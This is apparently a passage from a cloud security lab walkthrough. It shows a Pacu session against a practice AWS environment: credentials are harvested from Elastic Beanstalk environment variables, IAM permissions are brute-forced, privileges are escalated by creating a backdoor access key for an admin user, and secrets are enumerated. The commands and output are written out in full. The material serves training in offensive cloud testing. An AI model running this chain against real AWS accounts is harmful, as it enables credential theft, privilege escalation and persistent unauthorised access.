Pacu > ls
Pacu > search beanstalk
Pacu > help elasticbeanstalk__enum
Run Enumeration
Pacu > run elasticbeanstalk__enum --region us-east-1
[elasticbeanstalk__enum] Enumerating BeanStalk data in region us-east-1...
[elasticbeanstalk__enum] 1 application(s) found in us-east-1.
[elasticbeanstalk__enum] 1 environment(s) found in us-east-1.
Potential secret in environment variable: SSHSourceRestriction => tcp,22,22,0.0.0.0/0
Potential secret in environment variable: EnvironmentVariables => SECONDARY_SECRET_KEY=ZTh2BV46l3PBNkEFNfnZ********************,PYTHONPATH=/var/app/venv/staging-LQM1lest/bin,SECONDARY_ACCESS_KEY=AKIA****************
Potential secret in environment variable: SECONDARY_ACCESS_KEY => AKIA****************
[elasticbeanstalk__enum] 3 potential secret(s) found in config settings.
Secret Name
Value
SECONDARY_ACCESS_KEY
AKIA****************
SECONDARY_SECRET_KEY
ZTh2BV46l3PBNkEFNfnZ********************
Credentials extracted from environment variables.
š Phase 3: Initial User Permission Analysis
Bruteforce Permissions
Pacu > search iam
Pacu > run iam__bruteforce_permissions --region us-east-1
Pacu > search privesc
Pacu > run iam__privesc_scan --scan-only
[iam__privesc_scan] Escalation methods for current user:
[iam__privesc_scan] CONFIRMED: CreateAccessKey
[iam__privesc_scan] POTENTIAL: AttachUserPolicy
[iam__privesc_scan] POTENTIAL: CreateLoginProfile
[iam__privesc_scan] POTENTIAL: CreateNewPolicyVersion
[...]
Execute Privilege Escalation
Pacu > run iam__privesc_scan --user-methods CreateAccessKey
[iam__privesc_scan] Found 3 user(s). Choose a user below.
[iam__privesc_scan] [0] Other (Manually enter user name)
[iam__privesc_scan] [1] cgid135wosdg8e_admin_user
[iam__privesc_scan] [2] cgid135wosdg8e_low_priv_user
[iam__privesc_scan] [3] cgid135wosdg8e_secondary_user
[iam__privesc_scan] Choose an option: 1
[iam__backdoor_users_keys] Backdoor the following users?
[iam__backdoor_users_keys] cgid135wosdg8e_admin_user
[iam__backdoor_users_keys] Access Key ID: AKIA****************
[iam__backdoor_users_keys] Secret Key: fswAMaOCaa6Fxdxc4ii8********************
[iam__privesc_scan] Privilege escalation was successful
Pacu > search secret
Pacu > run secrets__enum --region us-east-1
[secrets__enum] Starting region us-east-1...
[secrets__enum] Found secret: cgid135wosdg8e_final_flag
[secrets__enum] secrets__enum completed.
[secrets__enum] MODULE SUMMARY:
1 Secret(s) were found in AWS secretsmanager
Check ~/.local/share/pacu/<session name>/downloads/secrets/ to get the values